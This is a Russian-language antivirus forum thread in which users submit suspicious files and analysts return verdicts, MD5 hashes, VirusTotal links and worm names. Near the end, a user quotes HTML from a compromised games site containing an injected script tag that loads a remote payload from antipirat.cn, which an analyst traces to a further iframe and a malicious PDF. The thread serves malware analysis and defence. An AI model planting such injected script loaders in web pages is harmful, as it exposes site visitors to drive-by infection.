Результат загрузки
Файл сохранён как 090822_021854_Quarantine_4a8f1d4e1376f.zip
Размер файла 24123
MD5 8ca44af8b52815bd5dc1885e0968b897
Файл закачан, спасибо!
Printable View
Результат загрузки
Файл сохранён как 090822_021854_Quarantine_4a8f1d4e1376f.zip
Размер файла 24123
MD5 8ca44af8b52815bd5dc1885e0968b897
Файл закачан, спасибо!
[B]vegas[/B], C:\Program Files\Microsoft Common\svchost.exe - Worm.Win32.Bezopi.bj
файл запускается из темп папки,
Результат загрузки
Файл сохранён как 090823_165425_vir_4a913c017fbcb.zip
Размер файла 100015
MD5 6475a662a30a6671ddf9bfc34382113a
Файл закачан, спасибо!
[B]NickM[/B], файл анализируется. Хотя я могу с уверенностью сказать, что он чистый. Так это от Realtek.
Несколько недель этот файл пользователя не могу добавить в базу чистых AVZ. Опасного ничего не вижу.
Файл сохранён как 090825_113653_virus_4a9394954a6b2.zip
Размер файла 299068
MD5 ebfd612b376d71c6540ebcf430a3bb93
Чистый...
Результат загрузки
Файл сохранён как 090825_181227_virus_4a93f14b415c8.zip
Размер файла 290940
MD5 826d9fb8b40d03aa4891b948da899bd0
Файл закачан, спасибо!
на вирустотал детект неоднозначный [url]http://www.virustotal.com/analisis/7c72c9ea31795ab18870ae395cf754a9045e31639ea0a3d7cf6f05141fb2b316-1251208899[/url]
[B]NickM[/B], install_winrout.bak проанализирован аналитиками ЛК, ответ: чистый.
Результат загрузки
Файл сохранён как 090826_121211_virus_4a94ee5b70b21.zip
Размер файла 2728392
MD5 9bfc1f12df97daf21972c80432ee57bf
Файл закачан, спасибо!
Результат загрузки
Файл сохранён как 090826_162139_virus_4a9528d3981ff.zip
Размер файла 74759
MD5 1bc3cf880222fec4571d4d3adeb3bfcc
Файл закачан, спасибо!
сидит в system32, после удаления восстанавливается
[B]vistaorxpmoy[/B],
Secrun.exe- [B]Net-Worm.Win32.Kolab.drb[/B]
[B]NickM[/B],
Файл безопасный...
Результат загрузки
Файл сохранён как 090827_162914_virus_4a967c1aea837.zip
Размер файла 165507
MD5 cb86a6cfc2d46b14788ce3b69781a2c3
Файл закачан, спасибо!
на вирустотал [url]http://www.virustotal.com/analisis/4e0d727d0532eb69c5eb942bbd4ef97bd6ad04ccd7884bc58f4ac6b1e2ea501d-1251375784[/url],
C:\WINDOWS\system32\REBUILDI.EXE
Активен, Ключ реестра, HKEY_USERS, S-1-5-19\Software\Microsoft\Windows\CurrentVersion\RunOnce, Rebuild Icon Cache
Новый зловред, уже второй день детектится только касперским - ей богу обидно!
[QUOTE]Файл сохранён как 090827_164443_virus_4a967fbbb194b.zip
Размер файла 199839
MD5 3160bfe32e62ec9dc83092810cfa9e34[/QUOTE]
пароль на архив: virus
[QUOTE]Новый зловред, уже второй день детектится только касперским - ей богу обидно![/QUOTE]
Тогда это форма бесполезна для вас :)
Файл сохранён как 090828_074827_virus_4a97538b9273f.zip
Размер файла 656
MD5 b1216eca9b5de38286dae07b1c9e9249
[B]valho[/B],
Вы прислали текстовый файл, он не может быть опасен и обработке не подлежит...
[QUOTE=Гриша;457561][B]valho[/B],
Вы прислали текстовый файл, он не может быть опасен и обработке не подлежит...[/QUOTE]
Ну я его на сайте одном нашёл с таким скриптом
[CODE]<script src=http://antipirat.cn/file/1.txt></script>[/CODE]
ну лана тогда... :)
[QUOTE='valho;457563']Ну я его на сайте одном нашёл с таким скриптом
[/QUOTE]
А там - ПДФка [url]http://www.virustotal.com/ru/analisis/0f736ea2e1306960a4fe124005c57f99ceea32837400d8109c92f068d2ae9dd7-1251436654[/url]
[CODE]<html>
<head>
<title>по жанру - Старые Игры: бесплатно скачать флеш игры, компьютерные java игры, скачать psp игры, прохождение</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<link href="/css/oldgames.css" rel="stylesheet" type="text/css">
</head>
<body><script src=[COLOR="Red"]http://antipirat.cn/file/1.txt[/COLOR]></script>
<div class="header">
<div class="nav">
<a href="http://oldgames.ru/"><img src="/images/oldgames/home.gif" />главная</a>
<a href="/search/"><img src="/images/oldgames/search.gif" />поиск</a>
<noindex><a href="http://forum.oldgames.ru"><img src="/images/oldgames/forum.gif" />форум</a></noindex>
<a href="/feedback/"><img src="/images/oldgames/mail.gif" />обратная связь</a>
<a href="/map/"><img src="/images/oldgames/search.gif" />карта</a>
</div>[/CODE]
и т.д
Интересно, а чем он тогда может быть закодирован этот .txt?
Ведь туда кто то что то прописывает наверно, периодически
[B]valho[/B], ни чем он не закодирован.
Просто там еще один JS-скрипт, который ставит следующий и-фрейм.